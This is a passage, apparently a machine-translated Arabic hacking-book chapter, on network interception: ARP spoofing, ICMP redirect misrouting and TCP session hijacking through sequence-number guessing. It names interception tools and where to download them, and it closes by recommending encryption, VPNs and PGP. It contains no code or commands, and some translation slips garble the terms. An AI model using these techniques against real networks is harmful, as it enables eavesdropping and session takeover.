يقوم المضيفان A وB بتخزين عناوين MAC المستلمة في ذاكرة التخزين المؤقت لـ ARP ثم استخدامها لإرسال الرسائل إلى بعضهما البعض. نظرًا لأن عنواني IP A وB يتوافقان مع عنوان MAC الخاص بجهاز الكمبيوتر الخاص بالمهاجم، فإن المضيفين A وB، دون أدنى شك، يتواصلان من خلال وسيط يمكنه فعل أي شيء برسائلهما.

للحماية من مثل هذه الهجمات، يجب على مسؤولي الشبكة الاحتفاظ بقاعدة بيانات تحتوي على جدول المراسلات بين عناوين MAC وعناوين IP لأجهزة الكمبيوتر الخاصة بالشبكة. بعد ذلك، باستخدام خاص برمجةعلى سبيل المثال، يمكن لأدوات arpwatch (ftp://ftp.ee.lbl.gov/arpwatch-2.lab.tar.gz) مسح الشبكة بشكل دوري وتحديد التناقضات.

على شبكات UNIX، يمكن تنفيذ هذا النوع من هجوم طلب ARP المخادع باستخدام أدوات النظام المساعدة لمراقبة وإدارة حركة مرور الشبكة، مثل arpredirect. لسوء الحظ، لا يبدو أن مثل هذه الأدوات المساعدة الموثوقة يتم تنفيذها على شبكات Windows 2000/XP. على سبيل المثال، على موقع NTsecurity (http://www.ntsecurity.nu) يمكنك تنزيل الأداة المساعدة GrabitAII، المقدمة كأداة لإعادة توجيه حركة المرور بين مضيفي الشبكة. ومع ذلك، فإن الفحص الأساسي لوظيفة الأداة المساعدة GrabitAII يُظهر أن النجاح الكامل في تنفيذ وظائفها لا يزال بعيدًا.

التوجيه الخاطئ

لإجراء توجيه خاطئ، يجب أن يعرف المهاجم بعض التفاصيل حول تنظيم الشبكة المحلية التي يقع فيها المضيف A، وعلى وجه الخصوص، عنوان IP الخاص بجهاز التوجيه الذي يتم من خلاله إرسال حركة المرور من المضيف A إلى B. وبمعرفة ذلك، المهاجم سيتم إنشاء مخطط بيانات IP حيث IP - يتم تعريف عنوان المرسل على أنه عنوان IP لجهاز التوجيه، ويكون المستلم هو المضيف A. كما يتم تضمين رسالة إعادة توجيه ICMP في مخطط البيانات مع تعيين حقل عنوان جهاز التوجيه الجديد على عنوان IP لجهاز الكمبيوتر الخاص بالمهاجم. بعد تلقي مثل هذه الرسالة، سيقوم المضيف A بإرسال كافة الرسائل إلى عنوان IP الخاص بجهاز الكمبيوتر الخاص بالمهاجم.

الأمثلة المذكورة أعلاه للاعتراضات (التي لا تكون قدرات المهاجمين محدودة عليها) تقنعنا بالحاجة إلى حماية البيانات المنقولة عبر الشبكة إذا كانت البيانات تحتوي على معلومات سرية. الطريقة الوحيدة للحماية من اعتراضات حركة مرور الشبكة هي استخدام البرامج التي تنفذ خوارزميات التشفير وبروتوكولات التشفير وتمنع الكشف عن المعلومات السرية واستبدالها. ولحل مثل هذه المشاكل، يوفر التشفير أدوات للتشفير والتوقيع والتحقق من صحة الرسائل المرسلة عبر البروتوكولات الآمنة.

يتم توفير التنفيذ العملي لجميع أساليب التشفير لحماية تبادل المعلومات الموضحة في الفصل الرابع من خلال شبكات VPN (الشبكة الخاصة الافتراضية). يمكن العثور على نظرة عامة موجزة عن مبادئ وتقنيات أمان التشفير في الملحق هـ وصف تفصيليأدوات حماية التشفير التي يوفرها تطبيق PGP Desktop Security (http://www.pgp.com).

اعتراض اتصال TCP

تم إنشاء العديد من الأدوات المساعدة الفعالة لتنفيذ هجمات اختطاف اتصال TCP، ولكن تم تنفيذها جميعًا لمنصة Unix، ويتم تقديم هذه الأدوات المساعدة على مواقع الويب فقط في نموذج التعليمات البرمجية المصدر. وبالتالي، كممارسين مقتنعين بالقضية النبيلة للقرصنة، فإن الهجمات التي تستخدم طريقة اعتراض اتصال TCP ليست ذات فائدة كبيرة بالنسبة لنا. (أولئك الذين يحبون فهم كود البرنامج الخاص بأشخاص آخرين يمكنهم الرجوع إلى الموقع http://www.cri.cz/~kra/index.html، حيث يمكنك تنزيله مصدرالأداة المساعدة الشهيرة لاعتراض اتصال Hunt TCP من Pavel Krauz).

على الرغم من عدم وجود أدوات عملية، لا يمكننا تجاهل موضوع مثير للاهتمام مثل اعتراض اتصالات TCP، وسنتناول بعض جوانب هذه الهجمات. يتم تقديم بعض المعلومات حول بنية حزمة TCP وإجراءات إنشاء اتصالات TCP في الملحق د من هذا الكتاب، ولكن هنا سنركز على السؤال - ما الذي يسمح بالضبط للمتسللين بتنفيذ هجمات اعتراض اتصال TCP؟ دعونا ننظر في هذا الموضوع بمزيد من التفصيل، والاعتماد بشكل أساسي على المناقشة في و.

يعد بروتوكول TCP (بروتوكول التحكم في الإرسال) أحد بروتوكولات طبقة النقل OSI الأساسية التي تسمح لك بإنشاء اتصالات منطقية عبر قناة اتصال افتراضية. عبر هذه القناة، يتم إرسال واستقبال الحزم مع تسجيل تسلسلها، ويتم التحكم في تدفق الحزم، وتنظيم إعادة إرسال الحزم المشوهة، وفي نهاية الجلسة تنقطع قناة الاتصال. يعد بروتوكول TCP هو البروتوكول الأساسي الوحيد في عائلة TCP/IP الذي يحتوي على نظام متقدم لتعريف الرسائل والاتصال.

لتحديد حزمة TCP، يوجد معرفان 32 بت في رأس TCP، يعملان أيضًا كعدادات للحزم، يُطلق عليهما رقم التسلسل ورقم الإقرار. سنكون مهتمين أيضًا بحقل آخر من حزمة TCP، يسمى بتات التحكم. يتضمن هذا الحقل المكون من 6 بتات بتات التحكم التالية (بالترتيب من اليسار إلى اليمين):

URG - علم الاستعجال؛

ACK - علامة التأكيد؛

PSH - حمل العلم؛

RST - علامة إعادة تأسيس الاتصال؛

SYN - علامة المزامنة؛

FIN - علامة إنهاء الاتصال.

دعونا نلقي نظرة على الإجراء الخاص بإنشاء اتصال TCP.

1. إذا كان المضيف "أ" بحاجة إلى إنشاء اتصال TCP مع المضيف "ب"، فسيرسل المضيف "أ" إلى المضيف "ب" الرسالة التالية:

أ -> ب: SYN، عيسى

هذا يعني أن الرسالة المرسلة من قبل المضيف A تم تعيين علامة SYN (رقم التسلسل المتزامن)، وتم تعيين حقل رقم التسلسل على القيمة الأولية 32 بت ISSa (رقم التسلسل الأولي).

2. استجابة للطلب المستلم من المضيف A، يستجيب المضيف B برسالة يتم فيها تعيين بت SYN وتعيين بت ACK. في حقل الرقم التسلسلي، يقوم المضيف B بتعيين قيمة العداد الأولية الخاصة به - ISSb؛ سيحتوي حقل رقم الإقرار بعد ذلك على قيمة ISa المستلمة في الحزمة الأولى من المضيف A، مع زيادة بمقدار واحد. لذلك يستجيب المضيف B بهذه الرسالة:

ب -> أ: SYN، ACK، ISSb، ACK(ISSa+1)

3. أخيرًا، يرسل المضيف A رسالة إلى المضيف B، حيث يتم تعيين بت ACK؛ يحتوي حقل الرقم التسلسلي على القيمة ISa + 1؛ يحتوي حقل رقم الإقرار على القيمة ISSb + 1. بعد ذلك، يعتبر اتصال TCP بين المضيفين A وB قائمًا:

أ -> ب: ACK، ISSa+1، ACK(ISSb+1)

4. الآن يمكن للمضيف A إرسال حزم البيانات إلى المضيف B عبر قناة TCP الافتراضية التي تم إنشاؤها حديثًا:

أ -> ب: ACK، ISSa+1، ACK(ISSb+1); بيانات

هنا DATA تعني البيانات.

من خوارزمية إنشاء اتصال TCP التي تمت مناقشتها أعلاه، يمكن ملاحظة أن المعرفات الوحيدة لمشتركي TCP واتصال TCP هما معلمتان 32 بت لرقم التسلسل ورقم الإقرار - ISSa وISSb. لذلك، إذا تمكن أحد المتسللين من معرفة القيم الحالية لحقول ISSa وISSb، فلن يمنعه شيء من إنشاء حزمة TCP مزيفة. وهذا يعني أن المتسلل يحتاج فقط إلى تحديد القيم الحالية لمعلمات ISSa وISSb لحزمة TCP لاتصال TCP معين، وإرسال الحزمة من أي مضيف إنترنت نيابة عن عميل اتصال TCP هذا، وهذه الحزمة سوف ينظر إليها على أنها صحيحة!

يعد خطر انتحال حزم TCP مهمًا أيضًا لأن بروتوكولات FTP وTELNET عالية المستوى يتم تنفيذها بناءً على بروتوكول TCP، ويعتمد تحديد عملاء حزم FTP وTELNET بالكامل على بروتوكول TCP.

بالإضافة إلى ذلك، نظرًا لأن بروتوكولي FTP وTELNET لا يتحققان من عناوين IP لمرسلي الرسائل، فبعد تلقي حزمة مزيفة، سترسل خوادم FTP أو TELNET رسالة استجابة إلى عنوان IP الخاص بمضيف المتسلل المحدد في الحزمة الزائفة. بعد ذلك، سيبدأ مضيف المتسلل في العمل مع خادم FTP أو TELNET من عنوان IP الخاص به، ولكن مع حقوق المستخدم المتصل قانونيًا، والذي بدوره سيفقد الاتصال بالخادم بسبب عدم تطابق العدادات.

وبالتالي، لتنفيذ الهجوم الموصوف أعلاه، فإن الشرط الضروري والكافي هو معرفة المعلمتين الحاليتين 32 بت ISSa وISSb اللتين تحددان اتصال TCP. دعونا نفكر الطرق الممكنةاستقبالهم. في حالة اتصال مضيف الهاكر بجزء الشبكة المهاجم، تكون مهمة الحصول على قيم ISS وISSb تافهة ويمكن حلها عن طريق تحليل حركة مرور الشبكة. لذلك، من الضروري أن نفهم بوضوح أن بروتوكول TCP يسمح، من حيث المبدأ، بحماية الاتصال فقط إذا كان من المستحيل على المهاجم اعتراض الرسائل المرسلة عبر هذا الاتصال، أي فقط في حالة اتصال مضيف المتسلل بمقطع شبكة مختلف عن مقطع المشترك في اتصال TCP.

ولذلك، فإن الهجمات المتداخلة تكون ذات أهمية كبيرة للمتسلل، عندما يكون المهاجم وهدفه في قطاعات مختلفة من الشبكة. وفي هذه الحالة، فإن مهمة الحصول على قيم ISa وISSb ليست تافهة. لحل هذه المشكلة، تم اختراع طريقتين فقط.

التنبؤ الرياضي بالقيمة الأولية لمعلمات اتصال TCP من خلال استقراء القيم السابقة لـ ISSa وISSb.

استغلال الثغرات الأمنية في تحديد مشتركي اتصال TCP على خوادم Unix rsh.

تم حل المهمة الأولى من خلال دراسات متعمقة حول تنفيذ بروتوكول TCP في مختلف المجالات أنظمة التشغيلوالآن أصبح لها أهمية نظرية بحتة. يتم حل المشكلة الثانية باستخدام نقاط الضعف أنظمة يونكسمن خلال تحديد المضيفين الموثوق بهم. (الموثوق به فيما يتعلق بمضيف معين A هو مضيف الشبكة B الذي يمكن للمستخدم الاتصال بالمضيف A دون مصادقة باستخدام خدمة r للمضيف A). من خلال معالجة معلمات حزم TCP، يمكن للمتسلل محاولة انتحال شخصية مضيف موثوق به واعتراض اتصال TCP مع المضيف المهاجم.

كل هذا مثير للاهتمام للغاية، لكن النتائج العملية لهذا النوع من الأبحاث لم تظهر بعد. ولذلك ننصح كل من يريد التعمق في هذا الموضوع أن يلجأ إلى الكتاب الذي أخذت منه المعلومات المقدمة أعلاه بشكل أساسي.

خاتمة

يعد اعتراض بيانات الشبكة الطريقة الأكثر فعالية لاختراق الشبكة، حيث يسمح للمتسلل بالحصول على جميع المعلومات المتداولة على الشبكة تقريبًا. وقد تم تحقيق أكبر تطور عملي عن طريق أدوات الشم، أي. الاستماع إلى الشبكات. ومع ذلك، لا يمكننا تجاهل طرق اعتراض بيانات الشبكة، والتي يتم إجراؤها عن طريق التدخل في الأداء الطبيعي للشبكة من أجل إعادة توجيه حركة المرور إلى مضيف القراصنة، وخاصة طرق اعتراض اتصالات TCP. ومع ذلك، من الناحية العملية، فإن الأساليب المذكورة الأخيرة لم تحصل بعد على التطوير الكافي وتحتاج إلى تحسين.

يجب أن يعلم مكافح القرصنة أن الخلاص الوحيد من اعتراض البيانات هو تشفيرها، أي تشفيرها. طرق حماية التشفير. عند إرسال رسالة عبر الشبكة، يجب أن تفترض مسبقًا أن نظام كابل الشبكة معرض للخطر تمامًا، وسيتمكن أي متسلل متصل بالشبكة من التقاط جميع الرسائل السرية المرسلة منها. هناك تقنيتان لحل هذه المشكلة - إنشاء شبكة VPN وتشفير الرسائل نفسها. من السهل جدًا حل جميع هذه المهام باستخدام حزمة برامج PGP Desktop Security (يمكن العثور على وصفها، على سبيل المثال، في).

شعبية في الفئة: